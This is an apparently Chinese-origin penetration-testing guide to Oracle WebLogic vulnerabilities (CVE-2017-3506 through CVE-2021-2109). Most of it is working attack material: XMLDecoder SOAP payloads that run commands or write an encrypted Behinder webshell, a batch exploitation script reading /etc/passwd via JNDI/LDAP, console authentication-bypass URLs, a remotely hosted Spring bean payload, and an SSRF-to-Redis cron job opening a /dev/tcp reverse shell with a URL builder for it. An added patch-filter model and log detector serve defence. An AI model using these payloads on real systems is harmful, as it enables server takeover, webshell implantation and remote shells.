1. Sending deserialization payloads via JavaBeans XML (XMLDecoder)
1.1 CVE-2017-3506 (XMLDecoder deserialization)
- Affected versions: WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0
- Location: 127.0.0.1:7001/wls-wsat/CoordinatorPortType (POST)
- Affected component: WLS Security
- How it works: the wls-wsat component hands the XML inside the WorkContext SOAP header to java.beans.XMLDecoder. XMLDecoder instantiates whatever classes the document names and invokes whatever methods it asks for, so parsing attacker-controlled XML is itself an arbitrary-object deserialization and leads straight to ProcessBuilder.start().
- Other exploitable URLs:
Every URI served by the wls-wsat package is affected; the ones present by default are:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
- Exploitation:
Capture the request, change the method to POST and set Content-Type: text/xml.
POST body:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
When this XML is deserialized, XMLDecoder constructs a ProcessBuilder and calls its start method. The response is an HTTP 500, but the command has already executed.
- Exploitation (writing a webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
<void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/* key = first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond */session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
When this XML is deserialized it constructs a PrintWriter on the given path (relative to the server's working directory, normally the domain directory), calls println to write the shell and close to flush it to disk.
Then connect with Behinder (冰蝎) to http://192.168.111.131:7001/bea_wls_internal/shell.jsp to test.
1.2 CVE-2017-10271 (XMLDecoder deserialization)
- Description: this is a bypass of the CVE-2017-3506 patch. That patch added a validation function that checks whether the payload contains an object element; replacing object with void (which, given a class attribute, instantiates the class just the same) gets past it, giving CVE-2017-10271.
- payload:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Many variant payloads appeared as well, using new and method elements instead of void:
<java version="1.4.0" class="java.beans.XMLDecoder">
<new class="java.lang.ProcessBuilder">
<string>calc.exe</string>
<method name="start" />
</new>
</java>
1.3 CVE-2019-2725 (XMLDecoder deserialization)
- Description: the core is still WebLogic's XMLDecoder deserialization. It is another entry point into, and a bypass of, the CVE-2017-10271 patch, which filtered elements named object, new and method and restricted void elements to either no attributes or only an index attribute.
- Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
- Location: 127.0.0.1:7001/_async/AsyncResponseService (POST)
- Affected components: bea_wls9_async_response.war, wls-wsat.war
- How it works:
1. With no method element and no void element carrying a method attribute, arbitrary methods can no longer be called. A class element can still name any class to deserialize, though, so arbitrary classes can still be instantiated.
2. Arguments can only be passed through void elements with no attributes or only an index attribute, and when an array is passed the array element's class attribute may only be empty or byte. That is enough for oracle.toplink.internal.sessions.UnitOfWorkChangeSet, whose constructor takes a byte[] and feeds it to ObjectInputStream.readObject(), i.e. a second, native Java deserialization.
- Exploitation:
Generate a serialized object with ysoserial, convert it into a byte array and splice it into the XML:
<?xml version="1.0" encoding="utf-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="5010">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
...
...
...
<void index="5007"><byte>120</byte></void>
<void index="5008"><byte>112</byte></void>
<void index="5009"><byte>120</byte></void></array>
</void></class>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body></soapenv:Body></soapenv:Envelope>
Because the JDK bundled with 10.3.6.0 is 1.6, the jdk7u21 gadget chain (which needs a JDK older than 7u21) reaches RCE.
WebLogic 12 does not ship the oracle.toplink.internal.sessions.UnitOfWorkChangeSet class, but org.slf4j.ext.EventData can be used for a second-stage deserialization instead: its String constructor parses the string with a fresh XMLDecoder, and that inner document is never seen by the WorkContext filter, so the blocked elements and attributes (void with class or method, object idref, ...) are all available again. The base64 of the compiled ResultBaseExec class is elided from the payload below:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="byte_arr"><string>...</string>
</void>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>ResultBaseExec</string>
<object idref="byte_arr"></object>
<void method="newInstance">
<void method="do_exec" id="result">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork" id="current_work">
<void method="getClass">
<void method="getDeclaredField">
<string>connectionHandler</string>
<void method="setAccessible"><boolean>true</boolean></void>
<void method="get">
<object idref="current_work"></object>
<void method="getServletRequest">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</void>
</void>
</void>
</void>
</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
The response is HTTP 202.
Alternatively get a shell directly with msf: exploit(multi/misc/weblogic_deserialize_asyncresponseservice)
1.4 CVE-2019-2729 (XMLDecoder deserialization)
- Description: similar to CVE-2019-2725, and another bypass of its patch.
- How it works: what the <class> element does can also be done with <array method="forName"> (Class.forName on the string child), so substituting <array method="forName"> for <class> bypasses the blacklist.
- Exploitation
poc:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><array method="forName">
<string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
<void><array class="byte" length="6006">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
...
...
...
<void index="6002"><byte>0</byte></void>
<void index="6003"><byte>126</byte></void>
<void index="6004"><byte>0</byte></void>
<void index="6005"><byte>45</byte></void>
</array></void></array></java>
</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
After this was published Oracle fixed it again, this time with a whitelist, implemented through the newly introduced validateFormat() function and the rules defined in WorkContextFormatInfo. <array> is still allowed, but only with a class attribute equal to byte or a length attribute (any value).
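To make the bypass chain in 1.1 to 1.4 concrete, here is an added Python model of the successive filters. It is not WebLogic's code: the rules are paraphrased from the descriptions above and simplified (the real checks live in WebLogic's WorkContext input adapter and have more detail), and the four payload cores are constructed minimal versions of the four payloads on this page, with a two-byte array standing in for a serialized object. Each payload passes the filter it was published against and is caught by the next one.

```python
import xml.etree.ElementTree as ET

WORK_CONTEXT = "{http://bea.com/2004/06/soap/workarea/}WorkContext"


def envelope(inner):
    """Constructed wls-wsat style envelope; only the WorkContext content is filtered."""
    return ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header>'
            '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
            + inner +
            '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>')


# Minimal payload cores, one per CVE, mirroring the payloads shown above.
CVE_2017_3506 = ('<java class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder">'
                 '<array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array>'
                 '<void method="start"/></object></java>')
CVE_2017_10271 = CVE_2017_3506.replace("<object ", "<void ").replace("</object>", "</void>")
BYTES = ('<array class="byte" length="2"><void index="0"><byte>-84</byte></void>'
         '<void index="1"><byte>-19</byte></void></array>')
CVE_2019_2725 = ('<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>'
                 f'<void>{BYTES}</void></class>')
CVE_2019_2729 = ('<java><array method="forName">'
                 '<string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>'
                 f'<void>{BYTES}</void></array></java>')


def elements_in_work_context(envelope_xml):
    """Every element nested under WorkContext, i.e. what XMLDecoder would see."""
    wc = ET.fromstring(envelope_xml).find(".//" + WORK_CONTEXT)
    return [] if wc is None else list(wc.iter())[1:]


# Each filter returns the reason it rejects the payload, or None if the payload passes.
def patch_3506(elems):
    """CVE-2017-3506 patch: reject any <object> element."""
    return next((f"<{e.tag}> element" for e in elems if e.tag == "object"), None)


def patch_10271(elems):
    """CVE-2017-10271 patch: reject object/new/method elements and any <void> attribute other than index."""
    for e in elems:
        if e.tag in ("object", "new", "method"):
            return f"<{e.tag}> element"
        if e.tag == "void" and set(e.attrib) - {"index"}:
            return "<void> with attribute other than index"
    return None


def patch_2725(elems):
    """CVE-2019-2725 patch: additionally reject <class>, and arrays whose class is not byte."""
    reason = patch_10271(elems)
    if reason:
        return reason
    for e in elems:
        if e.tag == "class":
            return "<class> element"
        if e.tag == "array" and e.get("class") not in (None, "byte"):
            return f'<array class="{e.get("class")}">'
    return None


def patch_2729(elems):
    """CVE-2019-2729 whitelist (validateFormat / WorkContextFormatInfo as described above):
    <array> may only carry class="byte" and/or length, so method="forName" is out."""
    reason = patch_2725(elems)
    if reason:
        return reason
    for e in elems:
        if e.tag == "array":
            for k, v in e.attrib.items():
                if not (k == "length" or (k == "class" and v == "byte")):
                    return f'<array {k}="{v}"> not whitelisted'
    return None


FILTERS = {"CVE-2017-3506 patch": patch_3506, "CVE-2017-10271 patch": patch_10271,
           "CVE-2019-2725 patch": patch_2725, "CVE-2019-2729 patch": patch_2729}


def classify(envelope_xml):
    """Map each patch level to the reason it blocks the payload, or None if it passes."""
    elems = elements_in_work_context(envelope_xml)
    return {name: check(elems) for name, check in FILTERS.items()}


if __name__ == "__main__":
    for name, core in [("CVE-2017-3506", CVE_2017_3506), ("CVE-2017-10271", CVE_2017_10271),
                       ("CVE-2019-2725", CVE_2019_2725), ("CVE-2019-2729", CVE_2019_2729)]:
        print(name)
        for level, reason in classify(envelope(core)).items():
            print(f"  {level:22s} {'passes' if reason is None else 'blocked: ' + reason}")
```

The pattern to take away is that each blacklist only removed the element the last public payload used, while XMLDecoder kept offering another spelling of "instantiate class X with argument Y"; only the final whitelist closes the class of bugs rather than the instance.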
2. LDAP remote code execution (CVE-2021-2109)
- Affected versions: WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
- Location: 127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
- Exploitation:
- As with CVE-2020-14882 (section 3 below), first reach the console through the unauthenticated path traversal:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
- Download and start the LDAP server the attack needs (the batch script below assumes JNDIExploit listening on port 1389).
- The command then executes through the unauthenticated access:
http://localhost:7001/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)
Note: the third separator in the LDAP server address is ; rather than ., and the command to run is passed in a request header named cmd, e.g. cmd: cat /etc/passwd.
- Batch detection poc:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

JNDI_PATH = ("/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral"
             "&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle"
             "(%22ldap://{host}:1389/Basic/WeblogicEcho;AdminServer%22)")


def CVE_2021_2109(target_url, ip):
    # The LDAP server address is written with ';' as its third separator (a.b.c;d), as noted above.
    target_url = target_url.strip()
    if not target_url.startswith('http'):
        target_url = 'http://' + target_url
    ldap_host = '.'.join(ip.split('.')[:3]) + ';' + ip.split('.')[-1]
    vuln_url = target_url + JNDI_PATH.format(host=ldap_host)
    headers = {'cmd': 'cat /etc/passwd'}  # the command travels in the cmd header
    try:
        r = requests.get(vuln_url, headers=headers, verify=False, timeout=5)
        if 'root' in r.text:
            print(f'\033[36m[+] {target_url} is vulnerable to CVE-2021-2109 \033[0m')
        else:
            print(f'\033[31m[x] {target_url} exploitation failed \033[0m')
    except Exception:
        print(f"\033[31m[x] {target_url} request timed out \033[0m")


if __name__ == '__main__':
    ip = str(input("\033[35mEnter the IP of the server running JNDIExploit >>> \033[0m"))
    with open('urls.txt') as f:
        targets = f.readlines()
    for t in targets:
        CVE_2021_2109(t, ip)
3. Unauthenticated remote command execution (CVE-2020-14882, CVE-2020-14883)
- Affected versions: Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
- Location: 127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
- Exploitation:
- First the authentication bypass (CVE-2020-14882): static resources under /console/css/ are served without authentication, and the double-encoded ../ only becomes a real traversal after that check has passed:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
- On WebLogic 12.2.1 and later the com.tangosol.coherence.mvel2.sh.ShellSession class can be used as the handle (CVE-2020-14883):
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/test%27);%22)
- Exploitation 2:
The method that works on every affected version: the com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext class.
- First craft a malicious Spring bean XML and host it somewhere WebLogic can fetch it:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/success2]]></value>
</list>
</constructor-arg>
</bean>
</beans>
- Then make WebLogic load the XML through the URL below; the bean's init-method runs ProcessBuilder.start() with the command:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("https://yuaneu.ro/exp/rce.xml")
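As an added detection-side example (not from the original write-up), here is a Python pass over constructed WebLogic access-log lines that flags the two things sections 2 and 3 have in common: the double-encoded ../ under /console/css/ (CVE-2020-14882) and a handle parameter naming one of the gadget classes (ShellSession and FileSystemXmlApplicationContext for CVE-2020-14883, JndiBindingHandle for CVE-2021-2109). The log lines, IPs and timestamps are made up for this example; the cmd header of CVE-2021-2109 never reaches an access log, so only the request line is inspected.

```python
import re
from urllib.parse import unquote

# Common-log-format line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Gadget classes from sections 2 and 3, keyed to the CVE they belong to.
GADGETS = {
    "com.tangosol.coherence.mvel2.sh.ShellSession": "CVE-2020-14883 ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext":
        "CVE-2020-14883 FileSystemXmlApplicationContext",
    "com.bea.console.handles.JndiBindingHandle": "CVE-2021-2109 JndiBindingHandle",
}
TRAVERSAL_TAG = "CVE-2020-14882 console auth bypass"

# Constructed sample log (hypothetical hosts and timestamps).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1200
10.0.0.9 - - [01/Jan/2021:10:00:01 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 3100
10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/test%27);%22) HTTP/1.1" 200 3400
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.0.0;9:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1" 200 3400
10.0.0.7 - - [01/Jan/2021:10:00:04 +0000] "GET /console/css/login.css HTTP/1.1" 200 800
"""


def decode_twice(s):
    """The path is percent-decoded a second time after the /console/css/ static-resource
    exemption has been applied, so %252e%252e (-> %2e%2e -> ..) only becomes a traversal
    afterwards; mirror that double decoding here."""
    return unquote(unquote(s))


def analyse_target(target):
    """Return the list of tags that apply to one request target (empty if benign)."""
    tags = []
    path = target.split("?", 1)[0]
    if "/console/css/" in path and "/../" in decode_twice(path):
        tags.append(TRAVERSAL_TAG)
    decoded = decode_twice(target)
    tags += [tag for cls, tag in GADGETS.items() if cls + "(" in decoded]
    return tags


def detect(log_text):
    """Parse each line and keep the ones with at least one tag."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = analyse_target(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "tags": tags})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], "; ".join(f["tags"]))
```

A bare traversal hit with no gadget class (the second line) is still worth an alert: it is the probe that precedes the real request, and a 200 on it means the bypass works.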
4. Arbitrary file upload (CVE-2019-2618)
- Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
- Location: 127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService (POST)
- Precondition: a valid username and password are required
- Exploitation:
Note that the steps below walk through the ws_utc/config.do upload path (the one tracked as CVE-2018-2894); the DeploymentService endpoint listed above is a separate, credentialed upload and is not what these steps exercise.
- First log into the admin console, tick "Enable Web Service Test Page" (启用 Web 服务测试页) and save.
- Open http://localhost:7001/ws_utc/config.do and set Work Home Dir to:
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
(this directory is served without authentication, which is the important point).
- Then go to Security -> Add, upload the webshell, and note the upload timestamp.
- Then request
http://localhost:7001/ws_utc/css/config/keystore/[timestamp]_[filename]
to execute the webshell.
5. SSRF (CVE-2014-4210)
- Affected versions: WebLogic 10.0.2 -- 10.3.6.0
- Location: 127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
- Exploitation:
Enter anything here, click Search and capture the request; the operator parameter (the highlighted field in the original screenshot) is the SSRF point.
The response differs between an open port such as 127.0.0.1:7001 and a closed one such as 8888, which is what makes internal port scanning through it possible.
- Exploitation 2:
Inject line breaks with %0D%0A and get a reverse shell through Redis:
xxx
set asd "\n\n* * * * * sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx
URL-encode the commands above.
poc:
http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx
Check on the Redis server: the cron job has been written, and a short while later the shell calls back.
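As an added example (not part of the original post), here is a Python helper that builds the section-5 SSRF URL from a list of Redis commands, plus a second function that reconstructs the raw HTTP request WebLogic's UDDI client would send once the servlet has percent-decoded the operator parameter, split the way Redis reads inline commands. Hosts, ports and the cron line are the placeholder values from the poc above; nothing is sent anywhere.

```python
from urllib.parse import parse_qsl, quote, urlencode, urlsplit

SEARCH_JSP = "/uddiexplorer/SearchPublicRegistries.jsp"


def redis_inline_payload(commands, junk="xxx"):
    """Join inline Redis commands with CRLF. The leading junk absorbs the 'GET /' that
    precedes the payload; the trailing junk absorbs ' HTTP/1.1' and the headers after
    it. Redis answers each unparseable line with an error and keeps reading."""
    return "\r\n".join([junk, *commands, junk])


def cron_reverse_shell_commands(lhost, lport):
    """The four commands from the poc above. The literal \\n escapes are expanded by
    Redis's quoted-string parser, so the dump file holds real newlines around the cron
    line and cron still finds it among the RDB framing bytes."""
    cron = f'set asd "\\n\\n* * * * * sh -i >& /dev/tcp/{lhost}/{lport} 0>&1\\n\\n "'
    return [cron, "config set dir /var/spool/cron", "config set dbfilename root", "save"]


def build_ssrf_url(weblogic_base, redis_host, redis_port, commands):
    """Encode the CRLF payload once (so %0D%0A survives the query string) and put it in
    the operator parameter of the search form, keeping the other form fields as in the poc."""
    operator = f"http://{redis_host}:{redis_port}/" + quote(redis_inline_payload(commands), safe="")
    params = {"rdoSearch": "name", "txtSearchname": "sdf", "txtSearchkey": "",
              "txtSearchfor": "", "selfor": "Business location", "btnSubmit": "Search",
              "operator": operator}
    return weblogic_base + SEARCH_JSP + "?" + urlencode(params, safe="%")


def what_redis_sees(url):
    """Decode the operator parameter the way the servlet does (percent-decoding turns
    %0D%0A into real CRLF), rebuild the request line the SSRF client emits, and split
    it into the lines Redis will try to parse as commands."""
    operator = dict(parse_qsl(urlsplit(url).query))["operator"]
    _, _, hostport, path = operator.split("/", 3)  # http: / '' / host:port / payload
    raw_request = f"GET /{path} HTTP/1.1\r\nHost: {hostport}\r\n\r\n"
    return raw_request.split("\r\n")


if __name__ == "__main__":
    url = build_ssrf_url("http://192.168.111.131:7001", "172.20.0.2", 6379,
                         cron_reverse_shell_commands("192.168.111.128", 4444))
    print(url)
    for line in what_redis_sees(url):
        print(repr(line))
```

Seen line by line, the first and last lines Redis reads are `GET /xxx` and `xxx HTTP/1.1`, both rejected, while the four lines in between are valid commands; that is the whole reason the `xxx` padding is there. The technique needs an unauthenticated Redis reachable from the WebLogic host and a Redis user allowed to write /var/spool/cron.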